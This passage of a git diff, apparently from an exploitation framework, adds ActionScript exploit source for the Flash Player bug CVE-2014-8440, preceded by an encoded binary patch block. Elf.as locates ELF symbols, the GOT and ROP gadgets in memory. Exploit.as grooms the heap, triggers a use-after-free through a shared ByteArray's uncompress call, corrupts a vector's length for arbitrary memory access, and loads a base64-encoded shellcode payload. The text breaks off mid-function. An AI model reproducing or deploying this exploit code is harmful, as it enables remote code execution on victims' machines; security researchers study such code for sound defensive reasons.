z4}M@Wzq-bINz4+~E8dFv_&L4d$*;B{5cnKLVz7%)SOD!cXi1g}cG4a%atA2Qx@D|<
zyZhaRJ%!T%)Kr}*!?u?;16i&Ge_!xCNs^l)T#~IicFxcPqZ*}yUUvG3Ivbw$MdB&R
z7TL(3V#IGC)v}q8df0XQci+WxEGzG$N>qJ@J;TfbCn%8pZ99qpXT=c!T+IVJmUw!Y
zR2KS9B>UwSgv2+OhiGd#<z?qY6cGpgFepI=ywx^*2Suy6H`@eHC&g6Fe@sCr=d2=#
z`#QpKR?+-TMdOnl<0S{`*?z`WXa{-j@xo2&rz9rXe^cK45X%w9YTkl6_eXSyA?QF;
zKc8jU%z~4Y(bzWqnv1~tBv|pK$Z*KWK;jGc$HEOq+TD!a^)^R9G!J|Jf+5{@Th4rP
zF^nqVV7Pnzxe6t{<<huAf4Qt8J7Z`WMn)S6hb|%_Tt(cN-U3~^0BJrUUN~3T^TGu4
z9erAxNPjK-XLUM)s~!JR1y_(zVe=WQFaR7k@YUshbX#!!=wObE%%I<VJ*a+vBBXe=
zcJ5M#g!Xc>vNr^Cp4g1(5iZ+7ppeB%30yXuy=9-_eS~-S=fi6LfA_xe)p()2EKGJI
ze*Q*f3!K`S&7eaZm)wH=_}Fb~Do88x{#OsJ?3}4nSr5+;_do!mxEl&SC5n{llNdL7
zMSUenY1%hG-;#1P%+Zxa(0V#T<Pl_~!`)ZBH<BZd;TcOFc?|Rz;n02Vhmm^|YMBhb
za7>Gx>SEn<HCd0Rf7;n2mG?wIkozTX^<qj(@xaj!X4Jo&3AOY2+^z!+`FcplCq2kw
zcCIY#>hW(d+nVC`>kSG&>fLS$YI6#TvwSIDwj^3A5FU6oapKrSyL4YrL_uR0`--+8
z>gD+9Ud1ar3G8Fj`j)grw6NA80k2WVEUm;G(O*Pv)mvW7e@sJ^01g2xS8~#UnT@<7
zaFEiB0&dvCZfmESO_)eN@FF@qyr?;jL`|=$^5rwS>)>S2wPy2w)DlGm{PCU~7bk^W
zn(7~SEMTk|mPMnSlT3WI^DE|n1fnP!9lDY;Sj&|v;}Wgw)i|CO&1<geNoNThwVl2V
zA9R$sKDF~Df94Htn4`I8JV!5JyZ?Aj$w=oGyvhbvNK90DIylCpmet|v;BPZ5<pf?L
zCSNJ%;n0(=0p;$A(6=z#esOs%QM)}<uVIHm-yJw4`tkuFW7^N_;NMMgCXn%Trm)_5
zZMEcPncju0(5+E0L}J1ZT${a)Pk|88W~W`jH8~-_e^}YC`qbcLHHa%R1LLov(4NCV
zC{Yh&;NfBT8bm&Zh9rj%8Seg=0ljTHK2{zj7k1S>V{`|dJWf;du2G%&!oAyUG6C{^
zJr67$Ln1<o@QA=#TFdA07#{~5my#{=b1?$Gj8_BNyuJxqnM<(%1kM6F`Wr-Gqx4#q
z<Cw##fAd^+PfvksnErW+MtI>;=oWR0E9P>6Lqg5~&MtL}JJ_JO!)nFk$uviW@K4xx
z7p-=3Gc&dQrDU|Jz7rQH2xfeXXGCEc%G^Ba!5t#%W>KKR7ADi^q*dES+Gs+um>L36
z2<np*JjU$ig-=!JGpOs4KmHaKzP7-`lvj0Le{l@9xHv~7lH)4YkF`xzx0Bm$0QX!i
z*^yHiW1u~^;p&2ewZ$m99E5PKAHN7(IEC;q3i{ziAJr$lrC^W&QW|DW#?M;IgtE=1
zuu#OftW_inX>y^$Y6G@N3hx>?nk&ca7EV$c$vs({@v!RDGnPyXO<bzAK4<aS^-=g}
ze|Hv*(5RAoI^xKJwUY8oAHTwlHM1pUTby5>N+gV(1KUmwV%gpRBJ1bh@GJ2AFw9sb
zqM^2$!Z2|8m88Xs;++-TH*t0%*AcI}U)`R=wG*V~>Sfi<(5PpOq^-`|+7szKgxXrC
z`CKQ9y~1sk(RTEDbZub%Zd-z6>{R92f4l&gFCW4fTHaqyVbCH$^U3~!han#5KHRKh
zK-pB&lZzA0yuyt$gSgzRe)=+5Vn6mIaY3F!CVU&#4E}n~GoD!JOLo<@EN!4|Xx|*|
z<z~e!uy}-?tk+BF?l^0B(uoKvGM!O}x&{Hlz(M46OdEM3%0~GtIwP%yIlcI9e{_V+
zV5-ZrhKiyQb=6@QbmX%hmuf)w%w$rLbe=fv?}(0Q?B*+xVFn=xcHs}ibG$7Fb#QJ1
zWZ_qQGb?-h3B!#V;<8wlDmMNe&-yaf&3y0&-6sUM9+a6e3>pwU21W=ICU(h|_mOCB
z%^7%8Jc=--KuY^kcpu<{)JB1me_#SFKqhD@G;2H*6!q0|Zx<ZT)uwTaq|nq9e{F2C
zqy;*;U<I<u86i+++qSVt*Dy&XcLJf_9nn18lu*g7Z+H~?q65RNk1kGE^>!FF<eF13
z&iROF1zat&qS**uc|L70M6?%a+qA~C$g3JR$L?0|gSEYnH|^p|+@Gb9e=|#a{ie{U
zodWTe7Yl~{CM@Ft9heJwBT80>ANnJ&(C#O^X`6@ptYLNxcOnl-C)nSs4P6+c8Y}Av
zKK?sl@O)*A5BPjEeixy=`p&sK&-Z|I`hRETxQF~)WANbNHAUrQp1uK<fn)y%gDr+U
zs6Pu^FRoa~YN)~L2JjLPe~x^!GH}t~w}Q8;d^+V~Po4RuF*qhPfw-L;D-cpxWe7tw
zuy?E-+90JO7Z<Ld|Cf_sNJPc2a7sZnx3<lX?Ue$vlWh}^Z;r)A6ge&s#h6OYDVg`}
zyS>efY(;?)jEYe$p%VSw!xB*>dwNw;OG!&R{741X?wv(9&)6u+e@HH-WQ}Bu$p0mk
zPbRAK?Q7(`3M)3$`dRQT@H6H@fN^!cbKjF=_N@tAIKGsq&q=c5;s`p7(ey+4-ofgd
zA{n&dgAuJ3b}i&I2q=?a@)O*Rh=qnLZWA32Q%ho)2b_n~eGAYrG7<vHTt@yPYIZZ8
z83F*{)kc1{BZ=zIe-a$7WZyVKdh@>ScV9ix5~zq)nGNm{|K@5qN37fItN7Sw&5dZ8
zypTt+wnlUP7;{TcP@6R1TZLhb8*)3j%l5LU;7FzX#69`WCV@;IK;9&STI;$(i>J4*
zSq*vNW^JzLwF<*z#@~6P7?S?VU*a9)LQRo`K(c}i1X1|fe}%-M?a|U~7d)v{*ZCso
zMOW;?J#_KHMO!G@=vhzE-$@~K>JTXnIK;$`pZ99U99~0R0P1=-sZA!oohvNhSoN1Z
zcV+h_h&W9?O-M2&T8e;PNK279nUl6A)`UbXqFkVPZ=PE6GosnkRWarDo)}E{_mLt1
zzkBpJpF=S@f8b+D)}}KA0_QzEqqi@*P5pzw(LHse*XP9B^ah^5>RW6{5>SGPD$xl`
zqvws?a1TlUYYTu$WPTUq4yg6l?&5{3H2w{AI><y$;IF7H{$ijs*oJc@z(j~zX?bnD
ztIF<f+O0R`6iZoAu&K-=el<b;JSs08MTWZM*4f`Cf30jpkW6Lal;PnwC)pfn@_0q|
zQgM!&Z@j)lYuh2jVNy7~f~OXPMZMJkr9O)xCHE!-Sy-7DWe<GodCc$g8OtW`k>4fG
zW#SpIu$E|5Iv;N-=FIKpbk<5kJ^X4;2z<A=ln2LcT$DHm-hAQSJyf+KXIX{Eyu!Ul
zJMP``e=_YAqvKfKG#EZ0afY&cYNf$mzw*#g>oqwJShxk<kiSZw&<B$_tz|f8ePvc<
z21!%PUTX;147in%p1XADck$b+-&vT4DWrMp@QJkHl(Pe-uye+S_`-Sb=Q2*dp~PP_
z>2&E6PSN|E2Yot@CAgfo;)@ATED{ip7iP^me-4ZxzU1Vnp|BwMR>Lb)TPVJH=(t>6
zPz5xIV<;u7qH8kSbBnBD{G4!X<-FkOTaPC)!{~@16wQxT2^Es9^)Z$13@5O7oHf#T
z`)yB2-qlAW^v0l7MYB5nH)&RI1|lTjkl=x&Z<A^w{e#f#m@Ch5aQVA^FY<<?_m(kK
zf7>D4T$hvKY;#;J6SdtF=mxg;NLMRZVMfB>!q${C$e<Mj?Nd=G`m3&|X5<dcF#^@i
zO;<yMwXq0e6SzQ68mXXE?ElKsblEx1z9Uz^>~yH`psV)VHricH{GvO6{u(&Z#~Kmo
zE|-t#QGDnek;Oc!YMeEB9wECEhvG&$f8*V^Y7!K^KRD>8B=k6Oi{OQ!8P^0VPKzp?
zcL}?|QAFe5@-zJ|FIrG>9)4Dcp@vnHbAW|%P<$1LE|g%v0mfSIB&P}84dBV34jJV}
z@iiWodnkdP2;kjFw=TI${FOfgvQ8IY)LB&y?1KOowK0CaQW~jB8hkyh+7tHXe~Vy!
z(l1ENE;MYAIzS~_Zva2NNKc4fL|t-seeVoRhWSCgIaI)Mo(IQYDDP}2+)&k+$Kbqx
z?~H-N&ua$DaD_+cmZq4TH~yd`KzZ~>SwS>Jikw&-&6zn5R4}6rm8oQh>NqHv6eoE`
zt$m)$QA7;kdqr+ji0WBYK`e{af0@W0rankx8MGhPWYT`~zZ>;oEo08zft@}H^FpMv
z)%*M!&Y0iEtpcz>SJ~iu=dqHnKw&L>Z75$~Q19t)IC#`!OY2)KYTzVAjB>TyiT*s%
zV7fIR*I^x`C0dh$#x3E47iu^OMC1beT(pRo+EAxb1CbK=r(zSV;B}ZPe*^x2E`i8J
zU<w<<JHOqX?QaX1OgXt)Oa>OFy6h-cjp~J{K@9`gZnPfk@rOX!{8HC~aAfPXty;ny
z%MM;RS)l)@{w}fgdkDS-Ne&$fc(DaH3XzhpQHe0G)qhsaB0L(M3qg#TM(n+$hNOmA
z%jEP_;DufkFP{`-SHwZ~e-DTr44yvBq3yC@0IQq+qvTJdPXF<!XTodLF4WE_7Ls2=
zNdimX*a*i^tEo=VutxgO{Cp^EY0gQ#KOqwUu%o&n_=`RqX#SxeJPB71^%5z(F3c)C
zo%>KVN7C?PcmKTb;`czY{|Nibqm0O-1q)T9238O)j221SSU*9ve-Vm?W+=I8B7!X2
z=p2bnzgV$dgSAYK%fld+Z9h7uf<qoor7(mX&$0@j?DUqVs+jH*fi0HU7h@=7b$5ZA
z4Szk+Vx#q4A4I+JVCVUkFD?*s!r-1$2AnT90qXME9EWjgXe3U=Lb&spWf{z-1kn#-
z20P*2XF4YnjBAuue;)JFVo@89S#<P7BtyW`$-?C)1dW~C5N`<hM;r3RB0z&<k21?`
zM4*i7_Jh=+c1&_lI=hGuGMzc5mK}Q2IIHBZVjiNlK%k<@iE7AaVXRsw8r-4G8UDMq
zos}4nB3BH@F77>Bx`yGeFlXA^j#XVmo!7#rk~P#7x-s*!e;8Q3C9a|TvgFsIK<aXi
zT;e1)FC%D$iZ>~L<4~w*L0B<`fWsfITwzS@R`^gdEvD=rJXHjcVG+fAhO$HyR!V*I
zCTv{v2+xz{1*1IDZkSN{f~3kfyVVDBMkN>9_Y|BtbqYb2f?4MiACWstN&jfqN<aNW
z({U<uugU^}e=}wC9q}MD(fUsL>SFD6xSiT5Le2@|UuR1VazLR<Q=BT^Zq9DPjIRw*
zN&(*xZbVRO6(1J~3iLWh)KQ_>(6X$!V3%zdbmc+LbC#M}|33{Jo=Y;cH{Pk62WKOs
zG}SJ_$i~S}7)c*bVuL!v0VfF9_wFNrkR9!K?>vxi@+&*L>3<ydDg-f3w%u?t;$W$x
zG&rmu&&0Og)i%8qgXGoSv|Jn9dn=We(M@2x#)N@&LVgW37+`Mf9fg02n;L(k=W7o?
z#z9nEmFY?oc(gvlY2pZ|45i!}Y?2<-OLIQ+A1%PVUo*`*#go7<O|bErz}$y(<eUks
zp96Pp6BVuB?tgGXR^-agFA&=iuoHW4^O?aQyoJI;khlbP?-q=_`mPJT<%r*4$c3Lx
zphD-NI-d#NGo&9h#DbWWOON)&XE;hIYxO9_EA|h`h?C@?XZ=K{nXVwUji$R)uUY5d
zK?00q$=EHmde{%64rzkP8gRRZKro=WV5u=D+O?w|tbfUQLQZK~#-<-CZp_(olI{vS
zIi1}iHp7$!u*o-H-rWV7y|u(njN{Wv6+N-fob@<|0p$gx>2iJYg+qWW&}Gr~R`^#W
zX;h^wmjiYKvTZiy{z7fc$Wh4kve<K{Y(3cm;9<$V+x7{*7Lq6VgHdITaR6C2Kf94C
z?-JQv*neX+L0ql(jcr}<o`djrnxH1Nz2r|35Q>KQVzfqngLVl`c?V&?szT*En@0Nv
zQPvYUdjG9UE9VFVzRK0}jD+L?&p4W~_*u2gHB%vsSHDDYcnhh{Z)}oF79ekmo3Ro0
zDXf?3Oz}q_(uvapjG8i8sIueJUKUg{bv=%3&VOoa21K9*+&-N)ixqMMhcSn1)jY1}
z?Mbu%ZST>9hpdyBJ@bcu84OO4&k%@%)}Nk2w<im%5BUtKpeC#XFMWqS=+n~ybed;Z
zG#t3M(%M*!*|&e7x~Vo+F3)BPC0_Y2YA*S_0oG-&8F1E4Il3kgS^Tob9-sRA%5wz_
zjDM`HhNqGUrdT6b1L`~>d<D6BV>x%b>r+6Gymg3;7aw?^ADEHfEiWVh+37tx<|Es{
zA4PdnOpG@LRfBsTH)HnGupe_hW^!F>scli@SqJ7=$&;j#bXeg(3ys26Ipo<9Scb3t
z<DO6XU@c`bdIC~pF3K7@Lg*Lz*JXnm8-JwIKFCi=u9R_8^S?B<*gaR-C)u75D28o@
znN)<Mj*$y3Rt9`+y+e?O6-V}qu<siSVE$Yhsga1Ag-(Ep((3n^@P-!+5X;FW>aY&t
zAvK4~TM|M%=jX!U`lW|&P}n*gW#mp@DH)yof{dbecUbH-I;j?|oN+-5J*&V@S$_s~
zQpfkpOq+JYvF3eP4ZwGKgKDC_yxR`#7f5*0JY(0Ef9i&|6#2}Zlz&4dxAKtT%1QUi
zUxQ2Q_%Bf>TW||M9yMC?A-FH0C-Rf)dQkq!L+sljQp9TeSFZXNkqbE2vlgs-s<VYF
zkbMFkns}LPGeD53v;~)u20aWvpnu53y-CI7KMk#&>u?^px>J1wa-?T2V)j)0Q}d-@
zejiQ-R$?lodNbk8K3xXw;NF}}ziA)v*$n{5b$b?#nci+sWedYJCyvR`HZ<8}#jggM
z!U%snwUy&5)!nyJ83!cAY$TB$nYw#;{l`tWOgSYsIGRfF&kxs4SSJxAdVi2XI*waJ
z#S>(6D#L2b(@I_H@{UWU@DtT4Ly2RTJYXP2r|7nbQDGfopTLaQ11Z~D`MYOcdvu8$
zrl#9-4@xo4<Z@MY8qs4$zy3!L2yuId4O@TA<1mEs<E7cmI9RIqJkEUU3)-xB5Qv8B
z?Qej1lX`s<Lfdhg$E}z$nt$)se195-eTv-u#J2pQLtpbN4wj%zU9&mNnumS9T>t;M
zO|BSQmSAQXe%=b<kF&hm`<!0-n%l_xl-*&v>*o6|%Qe+2Q+sZ26Ziv1IS|WHO*@GN
ziu70XeNHV7?4U08dK>rfV^Z?Mt=OoqmloktsqCdEJ-WFo&W1w)q<?uWRsLq9E%f-v
zjoDc7j`>YR1(r5otGUAXVy`cva(=j{9@mMrKz8Nwy-595E<~x2{%oxA@Gr9Q#p6Td
z_>Kpkywg;CE=~|gym`oVxhDwy85#>|cio}^j#T7n*et>65l<*wQ2v!>l?@t=@8a9!
z2p}$fJ>Wk@)4xPj%71clq~%3qtj)l|Zb6fsA5c)H+%}0}jSHnr&t>c2-caSCZ6YwG
z6XzF<@M3{1|G$jEcD=qmwe-GV75f0SePgVKCu!vk*AdJ{=^jvaCI0=#wDu2F6t#R_
zJp9$t!0Pf-Nf&rhB*o7;W+Xpd-kS<zMg1uoOPVF+Is5Hu8Gk%9>uC{K7X+~Lx*sY9
zu~RF*K}Hd2dnIk{Y2~Nn^i=lGHrKa<Kx$a|i>8-bMGV>nT~$JkCtdUPZC7a|3<1iG
zzhDv!lz`th>WRKr97J*GWK8v~0#|Xu&xgE^I*36BYgYc|B*rq9GLLDS#*$o8>3?cZ
zbz0PN`t!g?F@Ko;GRa1Z$UHAy6wA}tY8w-{vf+Y)b4xQ)8d)_l7EW3?Jb@^On^S*8
zri~>u%As|cU6N`0&G)LlF+fDoo5{#W982O{9pVdroxqJ!dX46pAP3m-OpIu<`Fwoc
zMPYlBw`NAJxjOQ45tHBtJDP?fEgR1^ojn7>a%6ZO;D4NsI5Pq#u4<ajp+?xTZv`^P
zPu6@{f5QB}f;is$2T(?QuDn6d;@YQQe*`7bxx&7Q%NDf1GKg|ya^;U`;$<FZnLA$`
zz#0<)5cCFh;o*FA@$#{oZyI*;f?EuJKyrrhh#~i8P{574&k$5!(6+uld-s|W1meh+
fWPeRs(iSldblkhS57fF3mq4=gPd)$tN_G(d4?NHJ

diff --git a/external/source/exploits/CVE-2014-8440/Elf.as b/external/source/exploits/CVE-2014-8440/Elf.as
new file mode 100755
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2014-8440/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-8440/Exploit.as b/external/source/exploits/CVE-2014-8440/Exploit.as
new file mode 100755
index 0000000000..f60ff34de6
--- /dev/null
+++ b/external/source/exploits/CVE-2014-8440/Exploit.as
@@ -0,0 +1,421 @@
+// Build how to:
+// 1. Download the AIRSDK, and use its compiler.
+// 2. Download the Flex SDK (4.6)
+// 3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
+//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
+// 4. Build with: mxmlc -o msf.swf Main.as
+
+// It uses original code from @hdarwin89 for exploitation using ba's and vectors 
+
+package
+{
+    import flash.utils.*
+    import flash.display.*
+    import flash.system.*
+    import mx.utils.Base64Decoder
+
+	public final class Exploit extends Sprite {
+		private var shared_ba:ByteArray = null
+		
+		private var hole_ba:ByteArray = null;
+		private var confuse_length_ba:ByteArray = null;
+		private var fake_ba:ByteArray = null;
+		private var worker:Worker = null;
+		
+		private var byte_array_vector:Vector.<Object> = null;
+		private var byte_array_vector_length:int;
+		
+		private var object_vector:Vector.<Object> = null;
+		private var object_vector_length:uint;
+		
+		private var ba:ByteArray
+		private var uv:Vector.<uint>
+		private var corrupted_uv_index:uint = 0
+		private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+		private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
+		
+		private var b64:Base64Decoder = new Base64Decoder();
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+		private var exploiter:Exploiter
+		
+		public function Exploit()  {
+			this.object_vector_length = 5770 * 2
+			this.byte_array_vector_length = 510 * 2
+			
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
+                        
+			this.initialize_worker_and_ba()
+			if (!this.trigger())
+			{
+				return
+			}
+            
+			var index:uint = search_uint_vector(114, 0x40000000)
+			if (index == 0xffffffff) {
+				return
+			}
+			
+			this.uv = this.object_vector[this.corrupted_uv_index]
+			
+			for (var i:uint = 0; i < object_vector.length; i++) {
+				if (i != corrupted_uv_index) 
+					object_vector[i] = null
+			}
+			Logger.alert('corrupted :) ' + this.uv.length.toString(16))
+			exploiter = new Exploiter(this, platform, os, payload, uv)
+        }
+        
+        final private function initialize_worker_and_ba():Boolean{
+			this.ba = new ByteArray()
+			this.ba.endian = "littleEndian"
+			this.ba.length = 1024
+			this.ba.writeUnsignedInt(0xdeedbeef)
+			this.ba.position = 0
+			
+			this.shared_ba = new ByteArray()
+			this.shared_ba.shareable = true
+			this.shared_ba.endian = Endian.LITTLE_ENDIAN
+			this.shared_ba.writeUnsignedInt(252536)
+			this.shared_ba.writeUnsignedInt(16777216)
+
+			this.confuse_length_ba = new ByteArray()
+			this.confuse_length_ba.length = 0x2000
+			this.confuse_length_ba.endian = Endian.LITTLE_ENDIAN
+			this.fill_byte_array(this.confuse_length_ba, 0xAAAAAAAA)
+
+			this.fake_ba = new ByteArray();
+			this.fake_ba.endian = Endian.LITTLE_ENDIAN;
+
+			this.worker = WorkerDomain.current.createWorker(loaderInfo.bytes);
+			return true;
+        }
+
+        final private function trigger():Boolean{
+			// Memory massaging
+			// 1. Create ByteArray's of 0x2000 lenght and mark one of them (hole_ba)
+			this.fill_byte_array_vector();
+			// 2. Clear the marked ByteArray
+			this.hole_ba.clear(); 
+
+			// The shared_ba should be left in "shared" state
+			this.worker.setSharedProperty("fnfre", this.shared_ba)
+			this.worker.setSharedProperty("vfhrth", this.confuse_length_ba)
+			this.worker.setSharedProperty("vfhrth", this.shared_ba)
+
+			// fake_ba *data* is going to fill the space freed from the hole
+			this.fake_ba.length = 0x2000;
+			this.fill_byte_array(this.fake_ba, 0xBBBBBBBB);
+
+			// Trigger the vulnerability, if the memory layout is good enough 
+			// the (freed) hole_ba metadata will end being the shared_ba metadata...
+			this.shared_ba.uncompress()
+
+			// So its size should be 0x2000
+			if (this.shared_ba.length != 0x2000)
+			{
+				return false
+			}
+
+			// Free the fake_ba and make holes on the ByteArray's 
+			// allocated on massaging.
+			this.free_fake_and_make_holes()
+
+			// Fill the holes and the fake_ba data space with 
+			// <uint> vectors
+			this.fill_with_vectors()
+
+			// Hopefully the shared_ba metadata, product of the vulnerability
+			// at this moment point to the  <uint> vectors in memory =) it means
+			// game over.
+			var pwn_test:uint;
+			this.shared_ba.position = 0;
+			pwn_test = this.shared_ba.readUnsignedInt();
+
+			if (pwn_test == 0xBBBBBBBB)
+			{
+				return false
+			}
+
+			return true;
+        }
+        
+		final private function fill_byte_array(local_ba:ByteArray, value:int):void{
+			var i:int;
+			local_ba.position = 0;
+			i = 0;
+			while (i < (local_ba.length / 4))
+			{
+				local_ba.writeInt(value);
+				i++;
+			};
+			local_ba.position = 0;
+        }
+        
+        final private function fill_byte_array_vector():void{
+			var i:int;
+			var local_ba:ByteArray;
+			this.byte_array_vector = new Vector.<Object>(this.byte_array_vector_length)
+
+			i = 0;
+
+			while (i < this.byte_array_vector_length)
+			{
+				local_ba = new ByteArray();
+				this.byte_array_vector[i] = local_ba;
+				local_ba.endian = Endian.LITTLE_ENDIAN;
+				i++;
+			}
+
+			var hole_index:int = this.byte_array_vector_length * 4 / 5;
+			if (hole_index % 2 == 0)
+			{
+				hole_index++;
+			}
+
+			for(i = 0; i < this.byte_array_vector_length; i++)
+			{
+				local_ba =  this.byte_array_vector[i] as ByteArray
+				local_ba.length = 0x2000
+				this.fill_byte_array(local_ba, 0xCCCCCCCC)
+				local_ba.writeInt(0xbabefac0)
+				local_ba.writeInt(0xbabefac1)
+				local_ba.writeInt(i)
+				local_ba.writeInt(0xbabefac3)
+				if (i == hole_index)
+				{
+					this.hole_ba = local_ba;
+				}
+			}
+
+			return;
+		}
+        
+		final private function free_fake_and_make_holes():void {
+			var i:int
+			var clear_ba:ByteArray
+			var hole_index:int = this.byte_array_vector_length * 4 / 5
+
+			if (hole_index % 2 == 0)
+			{
+				hole_index++;
+		    }
+	
+		    for (i = 0; i < this.byte_array_vector_length; i++)
+			{
+				if (i == hole_index) {
+					this.fake_ba.clear();
+				} else {
+					if (i % 2 == 1)
+					{
+						clear_ba = this.byte_array_vector[i] as ByteArray
+						this.fill_byte_array(clear_ba, 0xDDDDDDDD)
+						clear_ba.clear()
+					}
+				}
+			}
+		    return
+		}
+        
+		final private function fill_with_vectors():void {
+			var i:uint;
+			var uint_vector:Vector.<uint>;
+			var objects:Vector.<Object>;
+			this.object_vector = new Vector.<Object>(this.object_vector_length);
+
+			i = 0
+			while (i < this.object_vector_length)
+			{
+				this.object_vector[i] = new Vector.<uint>()
+				i++
+			}
+
+			i = 0
+			while (i < this.object_vector_length)
+			{
+				uint_vector = this.object_vector[i] as Vector.<uint>
+				uint_vector.length = 114
+				uint_vector[0] = 0xfeedbabe
+				uint_vector[1] = i
+				uint_vector[2] = 0xbabeface
+				i++
+			}
+		}
+        
+		// Use the corrupted shared_ba to search and corrupt the uint vector
+		// Returns the offset to the *length* of the corrupted vector
+		private function search_uint_vector(old_length:uint, new_length:uint):uint {
+			this.shared_ba.position = 0
+			var i:uint = 0
+			var length:uint = 0
+			var atom:uint = 0
+			var mark_one:uint = 0
+			var index:uint = 0
+			var mark_two:uint = 0
+			while (i < 0x2000) {
+				length = shared_ba.readUnsignedInt()
